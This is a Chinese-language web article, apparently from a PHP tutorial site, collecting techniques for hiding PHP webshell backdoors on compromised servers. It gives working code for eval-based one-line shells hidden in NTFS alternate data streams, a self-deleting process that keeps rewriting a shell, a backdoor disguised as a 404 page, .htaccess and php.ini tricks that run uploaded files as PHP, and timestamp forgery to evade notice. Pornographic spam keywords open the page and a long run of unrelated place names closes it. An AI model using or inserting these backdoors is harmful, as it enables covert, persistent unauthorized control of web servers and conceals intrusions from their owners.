最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

PHP后門隱藏的一些技巧總結(jié)

 更新時(shí)間:2020年11月04日 09:11:01   作者:Bypass  
這篇文章主要介紹了關(guān)于PHP后門隱藏的一些技巧,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧

前言

如果想讓自己的Webshell留的更久一些,除了Webshell要免殺,還需要注意一些隱藏技巧,比如隱藏文件,修改時(shí)間屬性,隱藏文件內(nèi)容等。

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時(shí)間屬性

當(dāng)你試圖在一堆文件中隱藏自己新創(chuàng)建的文件,那么,除了創(chuàng)建一個(gè)迷惑性的文件名,還需要修改文件的修改日期。

//修改時(shí)間修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//訪問(wèn)時(shí)間修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//創(chuàng)建時(shí)間修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個(gè)文件夾下所有文件的創(chuàng)建和修改時(shí)間

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內(nèi)容

在服務(wù)器上echo一個(gè)數(shù)據(jù)流文件進(jìn)去,比如index.php是網(wǎng)頁(yè)正常文件,我們可以這樣子搞:

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

這樣子就生成了一個(gè)不可見的shell hidden.jpg,常規(guī)的文件管理器、type命令,dir命令、del命令發(fā)現(xiàn)都找不出那個(gè)hidden.jpg的。

利用include函數(shù),將index.php:hidden.jpg進(jìn)行hex編碼,把這個(gè)ADS文件include進(jìn)去,這樣子就可以正常解析我們的一句話了。

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

4、不死馬

不死馬會(huì)刪除自身,以進(jìn)程的形式循環(huán)創(chuàng)建隱蔽的后門。

<?php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //刪除自身
while(1)
{ 
 file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //創(chuàng)建shell.php,這里最好用免殺的一句話
 sleep(10); //間隔時(shí)間
}
?>

處理方式最簡(jiǎn)單有效的辦法,就是重啟服務(wù)就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復(fù)制到modules文件夾,啟動(dòng)后門模塊,重啟Apache。當(dāng)發(fā)送特定參數(shù)的字符串過(guò)去時(shí),即可觸發(fā)后門。

github項(xiàng)目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁(yè)面隱藏后門

404頁(yè)面主要用來(lái)提升用戶體驗(yàn),可用來(lái)隱藏后門文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

7、利用 .htaccess 文件構(gòu)成PHP后門

一般.htaccess可以用來(lái)留后門和針對(duì)黑名單繞過(guò),在上傳目錄創(chuàng)建.htaccess 文件寫入,無(wú)需重啟即可生效,上傳png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規(guī)則,把文件名包含1的解析成php,上傳1.txt即可解析。

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執(zhí)行前后自動(dòng)解析的文件名稱,常用于頁(yè)面公共頭部和尾部,也可以用來(lái)隱藏php后門。

;在PHP文檔之前自動(dòng)添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文檔之后自動(dòng)添加文件。
auto_prepend_file = "c:\tmp.txt"

需重啟服務(wù)生效,訪問(wèn)任意一個(gè)php文件即可獲取webshell。

總結(jié)

到此這篇關(guān)于PHP后門隱藏的一些技巧的文章就介紹到這了,更多相關(guān)PHP后門隱藏技巧內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • 如何打開php的gd2庫(kù)

    如何打開php的gd2庫(kù)

    本文主要介紹了如何打開php的gd2庫(kù)的步驟方法。具有很好的參考價(jià)值,下面跟著小編一起來(lái)看下吧
    2017-02-02
  • php中strlen和mb_strlen用法實(shí)例分析

    php中strlen和mb_strlen用法實(shí)例分析

    這篇文章主要介紹了php中strlen和mb_strlen用法,結(jié)合實(shí)例形式分析了strlen和mb_strlen針對(duì)中英文結(jié)合字符編碼計(jì)算字符串長(zhǎng)度的操作技巧,需要的朋友可以參考下
    2016-11-11
  • PHP中變量引用與變量銷毀機(jī)制分析

    PHP中變量引用與變量銷毀機(jī)制分析

    這篇文章主要介紹了PHP中變量引用與變量銷毀機(jī)制,較為深入的分析了PHP中變量的引用機(jī)制及其原理以及對(duì)應(yīng)的變量的銷毀機(jī)制,有助于深入理解PHP程序設(shè)計(jì)原理,需要的朋友可以參考下
    2014-11-11
  • PHP中date與gmdate的區(qū)別及默認(rèn)時(shí)區(qū)設(shè)置

    PHP中date與gmdate的區(qū)別及默認(rèn)時(shí)區(qū)設(shè)置

    這篇文章主要介紹了PHP中date與gmdate的區(qū)別及默認(rèn)時(shí)區(qū)設(shè)置,需要的朋友可以參考下
    2014-05-05
  • 實(shí)例講解如何在PHP的Yii框架中進(jìn)行錯(cuò)誤和異常處理

    實(shí)例講解如何在PHP的Yii框架中進(jìn)行錯(cuò)誤和異常處理

    這篇文章主要介紹了如何在PHP的Yii框架中進(jìn)行錯(cuò)誤和異常處理的實(shí)例,重點(diǎn)講解了使用錯(cuò)誤處理器的方法,需要的朋友可以參考下
    2016-03-03
  • PHP程序員不應(yīng)該忽略的3點(diǎn)

    PHP程序員不應(yīng)該忽略的3點(diǎn)

    這篇文章主要介紹了PHP程序員不應(yīng)該忽略的3點(diǎn),變量、數(shù)組的應(yīng)用技巧;正則表達(dá)式;模板,需要的朋友可以參考下
    2015-10-10
  • PHP 數(shù)組基本操作小結(jié)(推薦)

    PHP 數(shù)組基本操作小結(jié)(推薦)

    下面小編就為大家?guī)?lái)一篇PHP 數(shù)組基本操作小結(jié)(推薦)。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
    2016-06-06
  • php獲取指定范圍內(nèi)最接近數(shù)的方法

    php獲取指定范圍內(nèi)最接近數(shù)的方法

    這篇文章主要介紹了php獲取指定范圍內(nèi)最接近數(shù)的方法,可實(shí)現(xiàn)根據(jù)給定區(qū)間長(zhǎng)度劃分各個(gè)區(qū)間,并在其中尋找與給定數(shù)最接近的數(shù),需要的朋友可以參考下
    2015-06-06
  • php源碼分析之DZX1.5加密解密函數(shù)authcode用法

    php源碼分析之DZX1.5加密解密函數(shù)authcode用法

    這篇文章主要介紹了php源碼分析之DZX1.5加密解密函數(shù)authcode用法,實(shí)例分析了DZX1.5中authcode函數(shù)加密與解密的使用技巧,需要的朋友可以參考下
    2015-06-06
  • php使用strtotime技巧示例解惑

    php使用strtotime技巧示例解惑

    這篇文章主要為大家介紹了php使用strtotime技巧示例解惑,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2022-09-09

最新評(píng)論

化州市| 临沭县| 集贤县| 邹平县| 遵化市| 玛多县| 宝兴县| 睢宁县| 富锦市| 阿拉尔市| 绥江县| 勐海县| 普安县| 石首市| 平顶山市| 长武县| 黄冈市| 济南市| 南京市| 定陶县| 毕节市| 昭平县| 兴化市| 蓝山县| 海林市| 永安市| 昌宁县| 同心县| 水城县| 嘉黎县| 南漳县| 延津县| 灵寿县| 若羌县| 根河市| 和田县| 乐亭县| 邵阳县| 成武县| 泽普县| 即墨市|